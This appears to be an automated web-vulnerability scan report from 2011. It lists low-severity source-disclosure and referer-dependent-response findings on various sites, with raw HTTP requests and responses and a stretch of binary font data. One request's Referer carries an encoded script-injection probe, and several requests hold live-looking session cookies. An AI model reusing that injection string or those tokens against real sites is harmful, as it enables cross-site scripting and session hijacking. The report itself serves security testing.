Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:53:53 GMT
Content-length: 27372
Content-type: text/plain
Last-modified: Thu, 10 Feb 2011 22:11:53 GMT
Etag: "6aec-4d5462a9"
Accept-ranges: bytes

wOFF......j.................................FFTM...l........X...GDEF.......2...8.;..OS/2.......W...`.A..cmap.......z......A.cvt .......d...d&b!.fpgm...........e../.gasp................glyf......].....
...[SNIP]...
</DCR2..4Ln7<%..........]......&.I@~.....y.D.......b~...$;2N."........=..G.....${vAy.q8j.!..d..w.....IFn^..J.....2..Ewb.s85l.*.mX.$<...^yv..mw.?y....r..)...'.J..............J..#..<..8    ..|._...o.....v..%w..4n.M...[v..k...?x..;....s...s..yQ......U....>Z6a.....y.y......l..m..M..u.$.;G...z.B.Q.0.G...n7...^.bX...Oa.7.    .v..S...7U.L=s....o...W7M..4n..q....`...h../..m.........(f6.y...x.qj.J../..+.....kd.@29..5....(..=J.}.'.1.....C.f..WV. aM..s.........A.,.*..Eb./.ob..;Y.O.z....E............,......v...Q.....W.....2..;6.._Bw.:...Ln.96......f........+...<....U...M....2.~.u.......u..EW^....!W..h...g......].<^,......V..K..!E...i7........bF.<.....%.......+.1.n`G4...*i.D........!H<W.a...MK.tPH..m.I.......0\_Q.%..2wrk....)j.x.Mq....M..|B.t....0e....    ....=m.q........}..y...g...sn&......P...*-h.Y....Nu..]V.......6|..}..Blm.G..C.-0+...1......
....H|VV...l~...lOn...T....X...|.?..KU,..ExN.T.-.4.G....u`8%.K..#..h.......Qi..d.2q..q...........J.7T..._!.\.$..JbM...q.D`{..d.=1w...=W+..+%....}Xda.....~5..|.5..6.]...J.. ..D1...3...ge(...Lg.P.z.....V..uE...5....a... ...X    ?7 .....tKP...E{.|."Vz.K........6A..jT.4......V-=S.Z.LN....:...z    ...`.z...LEy..+..w .-
).J.I8T7.....I.....D...`......<r9......+~8t..br..N.0......hO.%.B.v....D..?.H...YM..fr......+..C?..;.......w.;...o......)7[....8A..q8Y...{[..-.;P.......F...8!U.#..59..U....;w..v.b...O..I.Y...V.R...L.s........K...s...-s..?n.....Y.n.k..;.|c.]w...xM....tnS..8.UXo.}".a....$.L.)..K....$..J)O......^If.rJ.$..-...*F........5.].-/.-.+z&hy9...W.&...5.dE..xg+:k....a>II.......e...>..l.J#/.....9.....#._a.:.    ..~.u.6.......>....N.|..........^|.{..{8.^)...[....!..c...Jl......3....'.Q..!].....g.u..p;....b1..H.M..t...WH...l..=..<.........(.......    .M.[`.8./^...s....e...<....kv..c..nR.|.&...u.F.~3qn....#NY...].../..ck[-...#j.....ZI    .......m$.k......3.i.W...c(..yV....../%..9...J......Al.fx,<.,........ .W..*0..D.%E......{.~.."..9......ZL....s{.m..B.h.......3...=.C.    ..+\...`.8...'..5....V...........N.()=.I....".%T.uO.N.9    .. .or...N.n.}yw-yZ.B6..]..b.R...F..P.lT....Y..R..hQ....l..s......A.
..\0;..<Y.?$=.......c....+.V...O..p..hA....4.6W...4.Y%.'.Y+...L..ZEiCX.@./..p.].S....3`G............W}.?....z....Zx.^....$.....f,E)z.c..n...w.?..Q{/.c...8{..3....c.[..q.s.....h......c..;..w..K..qO...Y.Nc...5&....l.....v..J.4..8.:....A;....`*Q?.c./......%...f.>.....y.H..d.....%~h'..........e.iK....'..%....8..Vm....r.9@;^......Alq.N..2.^..Ji....]EmA..i....?..c.VA.z\^g.6W,.....).[.Y,.G.c..q)...r.c.....N7.Z....Lz..Y...;...d.<f..<z....}..*..R..GWX...V..;.....z:.6......O{>..3....If..d..Y.9$.z.Z\..h.S}.Jb.]....
..l.q.X..W!.9?.s;Ha.F.(+d4-..)+E..UXyAB... .4......f...Z..i..M..../@...#.
..8.0..lQ..S..-..tw./wq..=1..Q.@...R#............slf...T.....=..S.F..6+..h.)~w..u........M.m..M..4y.U.G.X..../<A{.......    +...]iRn.H.)..e^...K...'.a....2r....`!..{...p.f....^..!..CE..."...q.L    ..G.....GHx..%...xS.uJ.l...p..,...............R......a.R1..j..n...+..!..Kb..i.T...v..........%...F.~.@.......fRx...sq*..1.D<..n.0`
...OP&h/.V. \/.Y.8E/..
M.[.....q4.......Z    ,.\.o*7.>..d...M.\.....M.).{.
...{.x.`.;*(.....".I] .l.hZ+?.H..A......'G..`......4....p7...w.{.......#..j....5^;t..W.....Y.....7....B.....54L....{..9Yo.g.....Y.....*b        ...J>....gE.&..w...h .....~.. ....zi....H..Ini....X.....U.a..-.._.i...$/..2.W.l8....J6l.u...8j.'..4.h.....$I..../X..4g.....q.P8....d.N./n.}..W;I&.:R..e.!$.Io..F.b......g.....!..G......;..9..b.=.LO.|.?/...ws.....\p........G!/.N....Y.O.......'....'M\z..g.7...X?..[.^;...GHz..........W..q..h.9..1.d.O..O....f....C!..+.X..R&o=.c.).    ...!......3yB$.....M..I...gt.....~.5V..:.....Z....6.(..l.S".9.......S...`..y%....%.>|......Gz<.._....?..[..|..SGN..v.Q...X.|.M..I.o.=..SN......    .-.z.x......%..>$...v=..b..Mi..T,...Y...T....a.,..(k..&.@..-.^.......=.....{..7.....*i...U.W..=.....Kpo5..j.S....*...h...u5..3..,..=jO..7...s...>P.C..X..'.V..fC.X..|)
)..4`Ii.....j.......1.NJ.......a.........h....L"...O.=..W.....l.Ou.r..;.&6m.uqF.j..v..N]..{@@.....    .?G.k..G.:j<.......C....?3.H.x<._~j<...O..F,,..:.....6..Kb.....p. ...t.!.T..Vc.;-pN6..C<m...?x..!.d....)..X.(..J...IU*W.......]....~.'......Qm.U
.X......)...l...m .&.......#X.0#...I.v...*......c(X....c..S..9.t.g@.-.w...xDW1K.w>.S..v.-9...-o1fa@.V..4....y.....c..U.|......[D.^[%h.SF...t..^.v.I.^{B{z..Lt....(s.3{S.._../.-..u.M.;...T.......rw.."Q....]..7>~".u...@.>.j...?.x=...)......|-..,.....Ze.E.....n...v..c&@...P.......e%.y...6F..X......c..t...K.`.....$K..M..N..E6{p.`..(V'....Y...P47.WEn..*....A.9.\^2b.=....Dln4........{8....X..z..O.$V............7.Y.....b........!o.^.3l.........9.[x'........ps.^hK.G.
E..c..!...c..../...m!.5.......B..nh.vA.../.^.k.....$..!~w....Nd.....3[#..P#~'9..?........$....'...|_.5Q....(......z.=.E...8......Vlv`k....,8..&l.......`.......Dl.....V.o^;YD....v$...*.^<..JS.. ,...Z.K .y.3.o.eG+..(.b..E.T.S.jA.QTh.s...J...j~AaQ..$.T..1.z.!%....GI...G........S....]........(&..X.k..D    ...b.&}.............]A....w~%>
..h..9.*F..UQ6..j*pC...^K....\^_.Wc...\s.F.Mz.c..Hy....-
....2n%kC..L.t......\F56}H..`...LT.....#.h.......>
...[SNIP]...

20.2. http://i2.silverlight.net/resources/script/prettify/prettify-min.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://i2.silverlight.net
Path:   /resources/script/prettify/prettify-min.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /resources/script/prettify/prettify-min.js?cdn_id=12152010 HTTP/1.1
Host: i2.silverlight.net
Proxy-Connection: keep-alive
Referer: http://forums.silverlight.net/forums/t/226774.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 10 Feb 2011 22:21:19 GMT
Accept-Ranges: bytes
ETag: "b5ae49d770c9cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: max-age=89181986
Date: Sun, 24 Apr 2011 16:01:19 GMT
Connection: close
Content-Length: 26883

...//Prettify.js
window.PR_SHOULD_USE_CONTINUATION = true; window.PR_TAB_WIDTH = 8; window.PR_normalizedHtml = window.PR = window.prettyPrintOne = window.prettyPrint = void 0; window._pr_isIE6 = func
...[SNIP]...
elif esac eval fi function in local set then until ",
hashComments: true, cStyleComments: true, multiLineStrings: true, regexLiterals: true
}), G = {}; u(la, ["default-code"]); u(B([], [[z, /^[^<?]+/], ["dec", /^<!\w[^>]*(?:>|$)/], [C, /^<\!--[\s\S]*?(?:-\->|$)/], ["lang-", /^<\?([\s\S]+?)(?:\?>|$)/], ["lang-", /^<%([\s\S]+?)(?:%>|$)/], [E, /^(?:<[%?]|[%?]>
...[SNIP]...

20.3. http://ib.adnxs.com/if  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /if?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAHQ8BAgUCAAQAAAAAfCQDXwAAAAA.&pubclick=http://googleads.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBLQcy1z-0TfvdJsPplQf-o8nfAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtw1gQzvrLVnYgFBPfZb69xRqA_qVw%26client%3Dca-pub-6888065668292638%26adurl%3D&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658468%29%3Buf%28%27c%27%2C+43438%2C+1303658468%29%3Buf%28%27r%27%2C+158848%2C+1303658468%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3Bppv%288484%2C+%278902743736148832933%27%2C+1303658468%2C+1304263268%2C+43438%2C+25553%29%3B&cnd=!pBxEcQiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCN75EDGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676458&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658458620&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658458624&frm=1&adk=2614322350&ga_vid=648576074.1303658459&ga_sid=1303658459&ga_hid=197278331&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=8
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; sess=1; uuid2=2724386019227846218

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-K=VD1J`$[>KlFc@Mo]+N*fR)k>6'(p:XYXe81kw^+BCE9DeH3Vr#[[wG<k[?>d5frZ[bmm@Hq+gu@S75fBd-nWu!@>uzM?$SX.oJhK9eg2Xe?*pq8%TuDe)_1Y3qRhU>:L>>!Dl)nbWNb@GAx5bApcUu?x9N(/!a80.'OgN@$^j-uVt'v0`4hVA[Pc!T.fp1S9]vC?cG'u^t9aoHv_s`iqV84#d1siY/3qy.k>TVDhm3(sba]ASs@x4l@C?1VF^7@J; path=/; expires=Sat, 23-Jul-2011 15:20:57 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 15:20:57 GMT
Content-Length: 3578

<iframe src="http://view.atdmt.com/DEN/iview/289793864/direct/011303658455?click=http://ib.adnxs.com/click/mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P6UyfF9C5ox7SsYda6b2ziXXP7RNAAAAAD8wAAC1A
...[SNIP]...

20.4. https://online.americanexpress.com/myca/logon/us/docs/javascript/BICLogonJS.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/docs/javascript/BICLogonJS.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /myca/logon/us/docs/javascript/BICLogonJS.js HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fwww99.americanexpress.com%2Fmyca%2Fusermgt%2Fus%2Faction%3Frequest_type%3Dauthreg_PPLogin%26Face%3Den_US%26lgnsrc%3DPP%26REDIRECT_URL%3Dhttps%3A%2F%2Fwww152.americanexpress.com%2Fpremium%2Fcredit-report-monitoring%2Fenroll.do%3FSC%3D%26Face%3Den_US&Face=en_US
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=173.193.214.243-1303676103708679; NSC_nf3-x-vt-mphpo-c=ffffffff97a3d1e545525d5f4f58455e445a4a4299f9; sroute=655231498.58148.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:15:13 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 09 Apr 2011 01:33:33 GMT
Accept-Ranges: bytes
Keep-Alive: timeout=15, max=74
Connection: Keep-Alive
Content-Type: application/x-javascript
Vary: Accept-Encoding, User-Agent
Content-Length: 5514

/* added for US Accessibility modifications */var isMSBrowser=false;var isMozillaBrowser=false;if(navigator.appName == 'Netscape')    //Check if the User Agent is Mozilla    isMozillaBrowser = true;e
...[SNIP]...
et Explorer') //Check if the User Agent is IE    isMSBrowser = true;/*added for accessibility*/function bringFocusLayerBk(){    document.getElementById("custLayer").focus();}    var omn_hierarchy="<%=omnHeirarchy %>";    var omn_pagename="Login>
...[SNIP]...

20.5. https://protect724.arcsight.com/4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://protect724.arcsight.com
Path:   /4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /4.0.12/resources/scripts/gen/0a193341cddbead03735a451cdf385c6.js HTTP/1.1
Host: protect724.arcsight.com
Connection: keep-alive
Referer: https://protect724.arcsight.com/index.jspa
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; jive.server.info="serverName=protect724.arcsight.com:serverPort=443:contextPath=:localName=sgauwa100p:localPort=9201:localAddr=127.0.0.1"; JSESSIONID=7601BD8FD22C0BE72201B028BE68CCE8.node0; BIGipServerPool_97_SM11-7001=1108904202.22811.0000

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:19:03 GMT
Server: Apache-Coyote/1.1
X-JAL: 3
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
JP: D=21685 t=1303676344289279
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 749769

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<");if(c.substring(e,e+3)=="<?x"||c.substring(e,e+3)=="<?X"){var b=c.indexOf("?>");c=c.substring(b+2,c.length)}var e=c.indexOf("<!DOCTYPE");if(e!=-1){var b=c.indexOf(">
...[SNIP]...

20.6. https://psr.infusionsoft.com/js/sink_jq.jsp  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://psr.infusionsoft.com
Path:   /js/sink_jq.jsp

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /js/sink_jq.jsp HTTP/1.1
Host: psr.infusionsoft.com
Connection: keep-alive
Referer: https://psr.infusionsoft.com/InAppHelp/popUpCenter.jsp?pageName=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000409)%3C/script%3E
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1D05F63F025804F51DC0C60D07CE712E; SESS9dd4d016da30aa43b8e02b23417e983e=8cabe0c3be364f38f383997676b59504; LeadSource=www.infusionsoft.com; __utmz=84293057.1303693620.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __v1192_=46276302; Referer=http%3A%2F%2Fwww.infusionsoft.com%2F; Type=%28none%29; ISFunnel=ms; __v1192_vexclude=false; __v1192_nFactors=1; __v1192_recipeID=68334; 46276302_campaignID=2630; __utma=84293057.878895164.1303693620.1303693620.1303693620.1; __utmc=84293057; __utmv=84293057.|1=funnelSrc=ms=1,; __utmb=84293057.6.10.1303693620

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Expires: Mon, 25 Apr 2011 13:25:43 GMT
Content-Type: text/javascript;;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 01:25:43 GMT
Content-Length: 1143910


/* FILE: /js/prototype/lib/prototype.js */
/* Prototype JavaScript framework, version 1.6.1
* (c) 2005-2009 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT
...[SNIP]...
ribute('src', '/css/placeholder.htm');
tempIFrame.style.border = '0px';
tempIFrame.style.width = '0px';
tempIFrame.style.height = '0px';
//tempIFrame.document.domain = "<%=request.getServerName()%>";
IFrameObj = document.body.appendChild(tempIFrame);

if (document.frames) {
// this is for IE5 Mac, because it will only
// allow access to the document object
...[SNIP]...

20.7. https://www.senderscore.org/assets/jquery.selectsubcategory.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.senderscore.org
Path:   /assets/jquery.selectsubcategory.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /assets/jquery.selectsubcategory.js HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
Referer: https://www.senderscore.org/landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campid=701000000005Ucl; ss_lookup=osci4fep75ko01fvibcjgf03n3; BIGipServerw3pub=3372373002.20480.0000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:51:23 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
Last-Modified: Wed, 11 Aug 2010 17:55:58 GMT
ETag: "528021-a04-48d8ff63ee780"
Accept-Ranges: bytes
Content-Length: 2564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/javascript

/**
* Select Subcategory - A jQuery plugin for grabbing options of a select box using AJAX.
* Tested in jQuery v1.3.2 or above
*
* http://nilambar.com.np
*
* Copyright (c) 2010 Nilambar Sh
...[SNIP]...
irectory
* @subcategoryid:    id of the subcategory
*        Default is 'subcategory'
*
* JSON is used for sending data.
*
* In the server side, For example, PHP code:
* getsubcategories.php
* <?php
*    if(isset($_GET['myid']))
*    {
*        $curid=$_GET['myid'];
*        if($curid=='1')
*        {
*            echo '[ { "title": "Nepal", "key": "np" }, { "title": "China", "key": "ch" } ]';
*        }
*        else if($curid=='2')
*        {
*            echo '[ { "title": "Germany", "key": "gy" }, { "title": "Denmark", "key": "dk" } ]';
*        }
*        else
*        {
*            echo '[ { "title": "Select", "key": "-1" }]';
*        }
*        
*    }
*    ?>

*
*
*
*/(function($) {
$.fn.selectSubcategory = function(o) {
o = $.extend({ url: "getsubcategories.php", subcategoryid:'subcategory'}, o || {});
   var selectorid=this.selector;
ret
...[SNIP]...

21. Referer-dependent response  previous  next
There are 13 instances of this issue:


21.1. http://ad-emea.doubleclick.net/adi/N5295.150290.INVITEMEDIA.COM/B5186974.4  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4

Request 1

GET /adi/N5295.150290.INVITEMEDIA.COM/B5186974.4;sz=728x90;u=xbAGfINSIcy2XbsWwiQm12CTNkQYSTHPZADTxjxxBC2NTVgiv1DnGxT7jMRSV3fSsjDK_1O1i4gsgBOsJatCEzmlIWvGL5ueuCVQ;ord=[timestamp]? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=90&slotname=9524956792&w=728&lmt=1303676400&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_728_90_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658400828&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303658400833&frm=1&adk=513358139&ga_vid=1450357570.1303658401&ga_sid=1303658401&ga_hid=643969845&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3961147505&fu=4&ifi=1&dtd=10
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Sun, 24 Apr 2011 15:20:07 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 7658

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated
...[SNIP]...
f = "http://s1.2mdn.net/2675039/1-GGL_ADWORDS_CREATIVE1_728x90_GEN_B01_v2.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://adclick.g.doubleclick.net/aclk?sa=L&ai=BNLExpz-0TdqcDsmV6Aad9Pz5CwAAAAAQASAAOABQ3eLz1vj_____AViJwJwTYMnug4jwo-wSggEJY2EtZ29vZ2xlsgEbZ29vZ2xlYWRzLmcuZG91YmxlY2xpY2submV0yAEJ2gH_AWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvcGFnZWFkL2Fkcz9jbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2Mzgmb3V0cHV0PWh0bWwmaD05MCZzbG90bmFtZT05NTI0OTU2NzkyJnc9NzI4JmxtdD0xMzAzNjc2NDAwJmVhPTAmZmxhc2g9MTAuMi4xNTQmdXJsPWh0dHAlM0ElMkYlMkZwdWIucmV0YWlsZXItYW1hem9uLm5ldCUyRmJhbm5lcl83MjhfOTBfYi5waHAlM0ZzZWFyY2glM0QlN0IlMjRrZXl3b3JkJTdEJmR0PTEzMDM2NcACAqgDAdgEgK3iBOAEApoFGAjB1z8Q-PChHBiG0KBwIInAnBMotYaZAdoFAggA&num=0&sig=AGiWqty7hSovbSMgwz5PNQ-2EZ55520OVA&client=&adurl=https://services.google.com/fb/forms/adwordscoupon/?site=c-invite&utm_term=banner1c&utm_source=en-na-ha-rm-invite&utm_medium=ad&utm_campaign=en");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


